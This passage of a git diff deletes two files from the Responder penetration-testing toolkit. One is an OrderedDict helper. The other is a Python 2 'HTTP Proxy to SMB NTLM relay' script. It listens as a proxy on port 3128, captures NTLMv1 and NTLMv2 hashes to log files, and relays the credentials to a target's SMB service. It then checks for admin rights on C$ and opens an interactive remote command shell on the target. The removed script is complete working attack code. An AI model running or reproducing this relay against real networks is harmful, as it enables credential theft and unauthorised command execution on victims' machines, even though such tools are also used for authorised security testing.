-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-import sys, re, os, logging, warnings, thread, optparse, time
-from HTTPRelayPacket import *
-from Finger import RunFinger
-sys.path.append(os.path.abspath(os.path.join(os.path.dirname(__file__), '../../')))
-from socket import *
-
-__version__ = "0.5"
-
-def UserCallBack(op, value, dmy, parser):
-    args=[]
-    for arg in parser.rargs:
-        if arg[0] != "-":
-            args.append(arg)
-    if getattr(parser.values, op.dest):
-        args.extend(getattr(parser.values, op.dest))
-    setattr(parser.values, op.dest, args)
-
-parser = optparse.OptionParser(usage="python %prog -t10.20.30.40 -u Administrator lgandx admin", version=__version__, prog=sys.argv[0])
-parser.add_option('-t',action="store", help="Target server for SMB relay.",metavar="10.20.30.45",dest="TARGET")
-
-parser.add_option('-u', '--UserToRelay', action="callback", callback=UserCallBack, dest="UserToRelay")
-
-options, args = parser.parse_args()
-
-if options.TARGET is None:
-    print "\n-t Mandatory option is missing, please provide a target.\n"
-    parser.print_help()
-    exit(-1)
-if options.UserToRelay is None:
-    print "\n-u Mandatory option is missing, please provide a username to relay.\n"
-    parser.print_help()
-    exit(-1)
-
-UserToRelay = options.UserToRelay
-Host = options.TARGET, 445
-Cmd = ""
-
-def ShowWelcome():
-    print '\n\033[1;34mResponder Proxy Auth to SMB NTLMv1/2 Relay 0.2\nSupporting NTLMv1 and NTLMv2.'
-    print 'Send bugs/hugs/comments to: laurent.gaffie@gmail.com'
-    print 'Usernames to relay (-u) are case sensitive.'
-    print 'To kill this script hit CRTL-C.\033[1;31m\n'
-    print 'Use this script in combination with Responder.py for best results.'
-    print 'Do not to use Responder.py with -P set. This tool does the same'
-    print 'than -P but with cross-protocol NTLM relay. Always target a box ' 
-    print 'joined to the target domain,not the PDC as SMB signing is enabled '
-    print 'by default. For optimal pwnage and stealthiness, launch Responder '
-    print 'with these 2 options only: -rv \033[0m'
-    print '\n\033[1;34mRelaying credentials only for these users:\033[32m'
-    print UserToRelay
-    print '\033[0m\n'
-
-ShowWelcome()
-Logs_Path = os.path.abspath(os.path.join(os.path.dirname(__file__)))+"/../../"
-
-Logs = logging
-Logs.basicConfig(filemode="a",filename=Logs_Path+'logs/SMBRelay-Session.txt',level=logging.INFO, format='%(asctime)s - %(message)s', datefmt='%m/%d/%Y %I:%M:%S %p')
-
-try:
-    RunFinger(Host[0])
-except:
-    print "The host %s seems to be down or port 445 down."%(Host[0])
-    sys.exit(1)
-
-
-# Function used to write captured hashs to a file.
-def WriteData(outfile, data, user):
-	if not os.path.isfile(outfile):
-		with open(outfile,"w") as outf:
-			outf.write(data + '\n')
-		return
-	with open(outfile,"r") as filestr:
-		if re.search(user.encode('hex'), filestr.read().encode('hex')):
-			return False
-		elif re.search(re.escape("$"), user):
-			return False
-	with open(outfile,"a") as outf2:
-		outf2.write(data + '\n')
-
-#Function used to verify if a previous auth attempt was made.
-def ReadData(Outfile, Client, User, Domain, Target, cmd):
-    try:
-        with open(Logs_Path+"logs/"+Outfile,"r") as filestr:
-            Login = Client+":"+User+":"+Domain+":"+Target+":Logon Failure"
-            if re.search(Login.encode('hex'), filestr.read().encode('hex')):
-                print "[+] User %s\\%s previous login attempt returned logon_failure. Not forwarding anymore to prevent account lockout\n"%(Domain,User)
-                return True
-
-            else:
-                return False
-    except:
-        raise
-
-def ParseHTTPHash(data, key, client):
-	LMhashLen    = struct.unpack('<H',data[12:14])[0]
-	LMhashOffset = struct.unpack('<H',data[16:18])[0]
-	LMHash       = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
-	
-	NthashLen    = struct.unpack('<H',data[20:22])[0]
-	NthashOffset = struct.unpack('<H',data[24:26])[0]
-	NTHash       = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
-	
-	UserLen      = struct.unpack('<H',data[36:38])[0]
-	UserOffset   = struct.unpack('<H',data[40:42])[0]
-	User         = data[UserOffset:UserOffset+UserLen].replace('\x00','')
-
-	if NthashLen == 24:
-		HostNameLen     = struct.unpack('<H',data[46:48])[0]
-		HostNameOffset  = struct.unpack('<H',data[48:50])[0]
-		HostName        = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash       = '%s::%s:%s:%s:%s' % (User, HostName, LMHash, NTHash, key.encode("hex"))
-		WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
-                print "[+] Received NTLMv1 hash from: %s"%(client)
-                if User in UserToRelay or "ALL" in UserToRelay:
-                        print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
-                        if ReadData("SMBRelay-Session.txt", client, User, HostName, Host[0], cmd=None):
-                           return None, None
-                        else:
-                	   return User, HostName
-                else:
-                        print "[+] Username: %s not in target list, dropping connection."%(User)
-                	return None, None
-
-	if NthashLen > 24:
-		NthashLen      = 64
-		DomainLen      = struct.unpack('<H',data[28:30])[0]
-		DomainOffset   = struct.unpack('<H',data[32:34])[0]
-		Domain         = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
-		HostNameLen    = struct.unpack('<H',data[44:46])[0]
-		HostNameOffset = struct.unpack('<H',data[48:50])[0]
-		HostName       = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
-		WriteHash      = '%s::%s:%s:%s:%s' % (User, Domain, key.encode("hex"), NTHash[:32], NTHash[32:])
-		WriteData(Logs_Path+"logs/SMB-Relay-"+client+".txt", WriteHash, User)
-                print "[+] Received NTLMv2 hash from: %s"%(client)
-                if User in UserToRelay or "ALL" in UserToRelay:
-                        print "[+] Username: %s is whitelisted, fowarding credentials."%(User)
-                        if ReadData("SMBRelay-Session.txt", client, User, Domain, Host[0], cmd=None):
-                           return None, None
-                        else:
-                	   return User, Domain
-                else:
-                        print "[+] Username: %s not in target list, dropping connection."%(User)
-                	return None, None
-
-def longueur(payload):
-	return struct.pack(">i", len(''.join(payload)))
-
-def ExtractChallenge(data):
-    SecBlobLen = struct.unpack("<h", data[43:45])[0]
-    if SecBlobLen < 255:
-       Challenge = data[102:110]
-    if SecBlobLen > 255:
-       Challenge = data[106:114]
-    print "[+] Setting up HTTP Proxy with SMB challenge:", Challenge.encode("hex")
-    return Challenge
-
-def ExtractRawNTLMPacket(data):
-    SecBlobLen = struct.unpack("<h", data[43:45])[0]
-    SSP = re.search("NTLMSSP", data[47:]).start()
-    RawNTLM = data[47+SSP:47+SecBlobLen]
-    return RawNTLM
-
-def GetSessionResponseFlags(data):
-    if data[41:43] == "\x01\x00":
-       print "[+] Server returned session positive, but as guest. Psexec should fail even if authentication was successful.."
-
-def get_command():
-    global Cmd
-    Cmd = ""
-    while len(Cmd) is 0:
-       Cmd = raw_input("C:\\Windows\\system32\\:#")
-
-def SMBKeepAlive(s, data, NextEcho = 20):
-    while True:
-        head = SMBHeader(cmd="\x2b",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-        t = SMBEcho()
-        packet1 = str(head)+str(t)
-        buffer1 = longueur(packet1)+packet1  
-        s.send(buffer1)
-        data = s.recv(2048)
-        time.sleep(NextEcho)
-
-def HTTPProxyRelay():
-    so = socket(AF_INET,SOCK_STREAM)
-    so.setsockopt(SOL_SOCKET,SO_REUSEADDR, 1)
-    try:
-        so.bind(('0.0.0.0', 3128))
-        so.listen(10)
-        s = socket(AF_INET, SOCK_STREAM)
-        s.connect(Host)  
-        s.settimeout(30)
-    except:
-        "Cannot bind to port 3128, something else must be using it."
-        sys.exit(1)
-
-    try:
-        while True:
-            conn, addr = so.accept()
-            data = conn.recv(4096)
-            if not data: 
-               break
-            NTLM_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
-	    Basic_Auth = re.findall(r'(?<=Authorization: Basic )[^\r]*', data)
-	    if NTLM_Auth:
-	        Packet_NTLM = b64decode(''.join(NTLM_Auth))[8:9]
-		if Packet_NTLM == "\x01":
-                        ## SMB Block. Relay PROXY NTLM NEGO to target srv.
-                        h = SMBHeader(cmd="\x72",flag1="\x18", flag2="\x07\xc8")
-                        n = SMBNegoCairo(Data = SMBNegoCairoData())
-                        n.calculate()
-                        packet0 = str(h)+str(n)
-                        buffer0 = longueur(packet0)+packet0
-                        s.send(buffer0)
-                        smbdata = s.recv(2048)
-                        ##Session Setup AndX Request, NTLMSSP_NEGOTIATE
-                        if smbdata[8:10] == "\x72\x00":
-                           head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",mid="\x02\x00")
-                           t = SMBSessionSetupAndxNEGO(Data=b64decode(''.join(NTLM_Auth)))#
-                           t.calculate() 
-                           packet1 = str(head)+str(t)
-                           buffer1 = longueur(packet1)+packet1  
-                           s.send(buffer1)
-                           smbdata = s.recv(2048)
-                        
-                        ## Send HTTP Proxy 
-			Buffer_Ans = WPAD_NTLM_Challenge_Ans()
-			Buffer_Ans.calculate(str(ExtractRawNTLMPacket(smbdata)))#Retrieve challenge message from smb
-                        key = ExtractChallenge(data)#Grab challenge key
-			conn.send(str(Buffer_Ans))
-                        data = conn.recv(8092)
-
-                        NTLM_Proxy_Auth = re.findall(r'(?<=Authorization: NTLM )[^\r]*', data)
-                        Packet_NTLM = b64decode(''.join(NTLM_Proxy_Auth))[8:9]
-
-		        if Packet_NTLM == "\x03":
-			   NTLM_Auth = b64decode(''.join(NTLM_Proxy_Auth))
-                           Username, Domain = ParseHTTPHash(NTLM_Auth, key, addr[0])
-
-                           if Username is not None:
-                              ##Got the ntlm message 3, send it over to SMB.
-                              head = SMBHeader(cmd="\x73",flag1="\x18", flag2="\x07\xc8",uid=smbdata[32:34],mid="\x03\x00")
-                              t = SMBSessionSetupAndxAUTH(Data=NTLM_Auth)#Final relay.
-                              t.calculate()
-                              packet1 = str(head)+str(t)
-                              buffer1 = longueur(packet1)+packet1  
-                              print "[+] SMB Session Auth sent."
-                              s.send(buffer1)
-                              smbdata = s.recv(2048)
-   	                      return smbdata, s, addr[0], Username, Domain
-                           else:
-                              return None
-	    else:
-                Response = WPAD_Auth_407_Ans()
-	        conn.send(str(Response))
-                data = conn.recv(4096)
-
-    except:
-        return None
- 
-
-def RunPsExec(Host):
-
-    GetCredentials = HTTPProxyRelay()
-
-    if GetCredentials  == None:
-        return False
-
-    data, s, clientIP, Username, Domain = GetCredentials
-
-    if data[8:10] == "\x73\x6d":
-        print "[+] Relay failed, Logon Failure. This user doesn't have an account on this target.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
-        Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
-        return False
-    if data[8:10] == "\x73\x8d":
-        print "[+] Relay failed, STATUS_TRUSTED_RELATIONSHIP_FAILURE returned. Credentials are good, but user is probably not using the target domain name in his credentials.\n"
-        Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
-        return False
-
-    ## First, check if user has admin privs on C$:    
-    ## Tree Connect
-    if data[8:10] == "\x73\x00":
-        GetSessionResponseFlags(data)#Verify if the target returned a guest session.
-        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-        t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\C$")
-        t.calculate() 
-        packet1 = str(head)+str(t)
-        buffer1 = longueur(packet1)+packet1  
-        s.send(buffer1)
-        data = s.recv(2048)
-
-    ## Fail Handling.
-    if data[8:10] == "\x75\x22":
-        print "[+] Relay Failed, Tree Connect AndX denied. This is a low privileged user or SMB Signing is mandatory.\n[+] Hashes were saved anyways in Responder/logs/ folder.\n"
-        Logs.info(clientIP+":"+Username+":"+Domain+":"+Host[0]+":Logon Failure")
-        return False
-        return False
-
-    ## Fail Handling.
-    if data[8:10] == "\x75\xcc":
-        print "[+] Tree Connect AndX denied. Bad Network Name returned."
-        return False
-
-    ## Tree Connect
-    if data[8:10] == "\x75\x00":
-        print "[+] Looks good, "+Username+" has admin rights on C$."
-        head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-        t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
-        t.calculate() 
-        packet1 = str(head)+str(t)
-        buffer1 = longueur(packet1)+packet1  
-        s.send(buffer1)
-        data = s.recv(2048)
-
-    ## Go to NtCreateAndx
-    if data[8:10] == "\x75\x00":
-        print "[+] Authenticated.\n[+] Dropping into Responder's interactive shell, type \"exit\" to terminate\n"
-
-    while True:
-        if data[8:10] == "\x75\x00":
-            #thread.start_new_thread(SMBKeepAlive, (s,data, 15)) #keep it alive every 15 secs.
-            thread.start_new_thread(get_command, ())
-            while Cmd == "":
-                pass
-
-            if Cmd == "exit":
-               sys.exit(1)
-
-            data = RunCmd(data, s, clientIP, Username, Domain, Cmd, Logs, Host)
-
-        if data is None:
-           print "\033[1;31m\nSomething went wrong, the server dropped the connection. Make sure to clean the server (\\Windows\\Temp\\)\033[0m\n"
-
-        if data[8:10] == "\x2d\x34":#Confirmed with OpenAndX that no file remains.
-            head = SMBHeader(cmd="\x75",flag1="\x18", flag2="\x07\xc8",mid="\x04\x00",pid=data[30:32],uid=data[32:34],tid=data[28:30])
-            t = SMBTreeConnectData(Path="\\\\"+Host[0]+"\\IPC$")
-            t.calculate() 
-            packet1 = str(head)+str(t)
-            buffer1 = longueur(packet1)+packet1  
-            s.send(buffer1)
-            data = s.recv(2048)
-            Cmd2 = raw_input("C:\\Windows\\system32\\:#")
-
-            while len(Cmd2) is 0:
-                Cmd2 = raw_input("C:\\Windows\\system32\\:#")
-
-            if Cmd2 == "exit":
-               sys.exit(1)
-
-            data = RunCmd(data, s, clientIP, Username, Domain, Cmd2, Logs, Host)
-
-    if data[8:10] == "\x2d\x00":
-       print "[*] File still exist (Windows\\Temp\\Results.txt), server's not playing nicely."
-
-
-def main():
-    try:
-        num_thrd = 1
-        while num_thrd > 0:
-            RunPsExec(Host)
-            time.sleep(1)
-    except KeyboardInterrupt:
-        exit()
-
-if __name__ == '__main__':
-    try:
-        main()
-    except:
-        raise
-
-
-
diff --git a/tools/RelayHTTPSMB/odict.py b/tools/RelayHTTPSMB/odict.py
deleted file mode 100644
index 4e7b93b..0000000
--- a/tools/RelayHTTPSMB/odict.py
+++ /dev/null
@@ -1,117 +0,0 @@
-#!/usr/bin/env python
-# This file is part of Responder, a network take-over set of tools 
-# created and maintained by Laurent Gaffie.
-# email: laurent.gaffie@gmail.com
-# This program is free software: you can redistribute it and/or modify
-# it under the terms of the GNU General Public License as published by
-# the Free Software Foundation, either version 3 of the License, or
-# (at your option) any later version.
-#
-# This program is distributed in the hope that it will be useful,
-# but WITHOUT ANY WARRANTY; without even the implied warranty of
-# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-# GNU General Public License for more details.
-#
-# You should have received a copy of the GNU General Public License
-# along with this program.  If not, see <http://www.gnu.org/licenses/>.
-from UserDict import DictMixin
-
-class OrderedDict(dict, DictMixin):
-
-    def __init__(self, *args, **kwds):
-        if len(args) > 1:
-            raise TypeError('expected at most 1 arguments, got %d' % len(args))
-        try:
-            self.__end
-        except AttributeError:
-            self.clear()
-        self.update(*args, **kwds)
-
-    def clear(self):
-        self.__end = end = []
-        end += [None, end, end]
-        self.__map = {}
-        dict.clear(self)
-
-    def __setitem__(self, key, value):
-        if key not in self:
-            end = self.__end
-            curr = end[1]
-            curr[2] = end[1] = self.__map[key] = [key, curr, end]
-        dict.__setitem__(self, key, value)
-
-    def __delitem__(self, key):
-        dict.__delitem__(self, key)
-        key, prev, next = self.__map.pop(key)
-        prev[2] = next
-        next[1] = prev
-
-    def __iter__(self):
-        end = self.__end
-        curr = end[2]
-        while curr is not end:
-            yield curr[0]
-            curr = curr[2]
-
-    def __reversed__(self):
-        end = self.__end
-        curr = end[1]
-        while curr is not end:
-            yield curr[0]
-            curr = curr[1]
-
-    def popitem(self, last=True):
-        if not self:
-            raise KeyError('dictionary is empty')
-        if last:
-            key = reversed(self).next()
-        else:
-            key = iter(self).next()
-        value = self.pop(key)
-        return key, value
-
-    def __reduce__(self):
-        items = [[k, self[k]] for k in self]
-        tmp = self.__map, self.__end
-        del self.__map, self.__end
-        inst_dict = vars(self).copy()
-        self.__map, self.__end = tmp
-        if inst_dict:
-            return self.__class__, (items,), inst_dict
-        return self.__class__, (items,)
-
-    def keys(self):
-        return list(self)
-
-    setdefault = DictMixin.setdefault
-    update = DictMixin.update
-    pop = DictMixin.pop
-    values = DictMixin.values
-    items = DictMixin.items
-    iterkeys = DictMixin.iterkeys
-    itervalues = DictMixin.itervalues
-    iteritems = DictMixin.iteritems
-
-    def __repr__(self):
-        if not self:
-            return '%s()' % (self.__class__.__name__,)
-        return '%s(%r)' % (self.__class__.__name__, self.items())
-
-    def copy(self):
-        return self.__class__(self)
-
-    @classmethod
-    def fromkeys(cls, iterable, value=None):
-        d = cls()
-        for key in iterable:
-            d[key] = value
-        return d
-
-    def __eq__(self, other):
-        if isinstance(other, OrderedDict):
-            return len(self)==len(other) and \
-                   min(p==q for p, q in  zip(self.items(), other.items()))
-        return dict.__eq__(self, other)
-
-    def __ne__(self, other):
-        return not self == other